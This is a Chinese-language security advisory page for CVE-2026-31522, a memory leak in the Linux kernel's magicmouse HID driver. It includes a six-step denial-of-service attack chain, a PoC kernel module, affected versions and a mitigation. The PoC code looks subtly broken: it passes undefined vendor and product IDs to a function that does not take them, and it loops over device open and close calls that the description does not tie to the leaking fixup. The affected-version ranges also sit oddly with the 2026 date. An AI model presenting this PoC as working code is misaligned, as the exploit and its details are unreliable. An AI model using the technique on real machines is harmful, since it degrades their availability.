CVE-2026-31522 CVSS 5.5 中危

CVE-2026-31522 Linux内核magicmouse内存泄漏漏洞

披露日期: 2026-04-22

来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号

CVE-2026-31522

漏洞类型

内存泄漏

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

Linux内核中HID子系统的magicmouse驱动存在内存泄漏漏洞。magicmouse_report_fixup()函数在使用kmemdup()分配新缓冲区后返回，但从未释放该内存。由于report_fixup()的调用者不会接管返回指针的所有权，导致分配的内存无法被正确释放，从而造成内存泄漏。

技术细节

该漏洞位于Linux内核的drivers/hid/hid-magicmouse.c文件中的magicmouse_report_fixup()函数。该函数用于修复和转换Magic Mouse设备的报告描述符。函数内部调用kmemdup()复制并分配新的缓冲区，然后返回该指针。然而，根据HID子系统的设计规范，report_fixup()回调函数的调用者不会释放返回的指针，只负责释放原始的rdesc缓冲区。因此，每次调用该函数时都会泄漏一个分配的缓冲区。攻击者可以通过反复触发设备重连或报告描述符重新加载来累积内存泄漏，最终可能导致系统内存耗尽，引发拒绝服务。

攻击链分析

STEP 1

步骤1

攻击者获取本地访问权限（需要低权限账户）

STEP 2

步骤2

连接或模拟Magic Mouse设备

STEP 3

步骤3

反复触发设备重连或HID模块重新加载

STEP 4

步骤4

每次触发都会调用magicmouse_report_fixup()导致内存泄漏

STEP 5

步骤5

累积内存泄漏直至系统内存耗尽

STEP 6

步骤6

系统响应变慢或崩溃，造成拒绝服务

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

/*
 * PoC for CVE-2026-31522: HID magicmouse memory leak
 * This PoC triggers the memory leak by repeatedly reconnecting
 * a Magic Mouse device or reloading the HID module.
 */

#include <linux/module.h>
#include <linux/hid.h>
#include <linux/usb.h>

static int __init leak_poc_init(void)
{
    struct hid_device *hdev;
    int i, ret;
    
    // Find magicmouse HID device
    hdev = hid_get_device_drvdata(MAGICMOUSE_VENDOR_ID, 
                                   MAGICMOUSE_PRODUCT_ID);
    if (!hdev) {
        pr_err("Magic Mouse device not found\n");
        return -ENODEV;
    }
    
    // Trigger report_fixup multiple times to leak memory
    for (i = 0; i < 1000; i++) {
        ret = hid_hw_open(hdev);
        if (ret)
            pr_err("Failed to open device: %d\n", ret);
        
        hid_hw_close(hdev);
    }
    
    pr_info("Memory leak triggered - check kernel logs\n");
    return 0;
}

static void __exit leak_poc_exit(void)
{
    pr_info("PoC module unloaded\n");
}

module_init(leak_poc_init);
module_exit(leak_poc_exit);
MODULE_LICENSE("GPL");

影响范围

Linux Kernel < 5.10.156

Linux Kernel < 5.15.81

Linux Kernel < 6.1.1

防御指南

临时缓解措施

如果无法立即升级内核，可以临时禁用magicmouse驱动模块（rmmod hid_magicmouse）或断开Magic Mouse设备连接以防止漏洞被触发。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表